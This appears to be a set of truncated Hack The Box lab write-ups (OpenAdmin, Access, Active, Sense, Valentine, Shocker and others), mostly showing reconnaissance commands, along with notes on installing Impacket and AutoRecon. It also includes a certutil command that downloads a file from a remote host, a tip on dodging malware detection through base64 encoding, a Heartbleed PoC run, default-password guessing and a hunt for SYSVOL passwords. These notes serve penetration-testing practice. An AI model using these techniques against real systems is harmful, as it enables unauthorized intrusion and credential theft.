HTB OpenAdmin

Enumeration

$ nmap -A -T4 -p- 10.10.10.171
$ gobuster dir -u 10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

Access to http://10.10.10.171
Access to http://10.10.10.171/music
There is a login link. Clicking it redirects you to http://10.10.10.171/ona. Based on this screenshot, we have an OpenNetAdmin (v18.1.1) instance.
Access to http://10.10.10.171/sierra
Access to http://10.10.10.171/artwork

Vulnerability analysis

$ searchsploit opennetadmin
$ searchsploit -x 47691

The -d option in curl means data. -d, --data: (HTTP MQTT) Sends the specified data in a POST

HTB Friendzone

$ sudo nmap -A -T4 -p- 10.10.10.123
$ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u http://10.10.10.123/

Access to http://10.10.10.123
Access to https://10.10.10.123/
We discovered that the SSL certificate uses the common name friendzone.red (it is a vhost), so we can access https://friendzone.red/ (after adding this host to the /etc/hosts file).
We can do a zone transfer for that domain I saw earlier on the main page and get the

HTB Access

$ nmap -A -T4 -p- 10.10.10.98

Open ports detected:
• 21/tcp open ftp Microsoft ftpd
• 23/tcp open telnet?
• 80/tcp open http Microsoft IIS httpd 7.5

$ ftp 10.10.10.98
ftp> dir
ftp> cd Backups
ftp> dir
ftp> get backup.mdb
ftp> cd ..
ftp> dir
ftp> cd Engineer
ftp> dir
ftp> get "Access Control.zip"

The files haven't been downloaded correctly. By default, ftp is set to text (ASCII) mode. We need to download these files again, this time using

Impacket installation

Impacket is a collection of Python classes for working with network protocols. https://github.com/SecureAuthCorp/impacket

Installation process:
Download the latest release.
Extract the file.
Install the requirements.
Install the package.

$ pip install -r requirements.txt

If we get an error installing the wheel package, we can install it individually.
$ pip install wheel
Now run the configuration script.
$ python setup.py bdist_wheel
Let's try to install the requirements again:
$ pip install -r requirements.txt

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command downloads "file" to the Windows machine from http://<ip>:
certutil.exe -urlcache -split -f http://<ip>/file file
Depending on the file, it could be detected as malicious and blocked. A possible solution is the method described in this post from https://www.bleepingcomputer.com. The trick is based on base64-encoding the file when sending the

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. https://github.com/Tib3rius/AutoRecon

Run the installation script:
$ python3 -m pip install git+https://github.com/Tib3rius/AutoRecon.git
Add /home/ruben/.local/bin to your PATH.

Install the other requirements:
$ sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner

HTB Active

$ sudo nmap -A -T4 -p- 10.10.10.100

Let's enumerate SMB resources using SMBMap.
$ smbmap -H 10.10.10.100
$ smbclient //10.10.10.100/Replication
smb: \> dir

This share seems to be a copy of SYSVOL. According to the information found in:
Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
Attack Methods for Gaining Domain Admin Rights in Active Directory
We need to find a file such as groups.xml, scheduledtasks.xml or Services.xml where

HTB Sense

$ nmap -A -T4 -p- sense.htb
$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e

We need to skip SSL certificate verification using the -k option.
$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -k
$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -x .txt

We've found 2 text documents:
changelog.txt
system-users.txt

Company defaults? As we have a pfSense site, we can try the default pfSense password (pfsense).
Access to http://10.10.10.60
This

HTB Valentine

$ sudo nmap -T4 -A -p- 10.10.10.79
$ gobuster dir -u https://10.10.10.79 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -k
$ nikto -h 10.10.10.79
$ sudo nmap --script vuln -p 80 10.10.10.79
$ sudo nmap --script vuln -p 443 10.10.10.79

Based on these results, this box is vulnerable to Heartbleed. https://github.com/sensepost/heartbleed-poc
$ python heartbleed-poc.py 10.10.10.79
$ strings dump.bin

Using https://www.base64decode.org/:
aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== decodes to heartbleedbelievethehype

Access to https://10.10.10.79/dev
https://10.10.10.79/dev/notes.txt
https://10.10.10.79/dev/hype_key
This is hexadecimal encoding. If we use a hexa

HTB Shocker

ruben@kali:~/htb$ sudo nmap -T4 -sV -p- shocker.htb

We just have Apache on port 80 and OpenSSH on port 2222.
Access to http://shocker.htb

ruben@kali:~/htb$ gobuster dir -u http://shocker.htb -w /usr/share/wordlists/dirb/common.txt -e

We have a cgi-bin folder that may contain script files. Let's use Gobuster again, this time searching for files by extension (.sh, .py).
$ gobuster dir -u http://shocker.htb/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -x py -x sh

Based on the box name